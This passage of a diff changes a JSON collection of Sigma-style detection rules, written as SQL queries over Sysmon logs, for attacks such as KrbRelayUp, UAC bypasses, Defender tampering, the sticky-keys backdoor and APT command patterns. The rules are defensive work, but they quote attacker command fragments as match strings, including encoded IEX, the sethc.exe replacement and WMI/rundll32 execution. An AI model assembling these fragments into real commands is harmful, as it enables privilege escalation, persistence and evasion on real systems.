"Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' 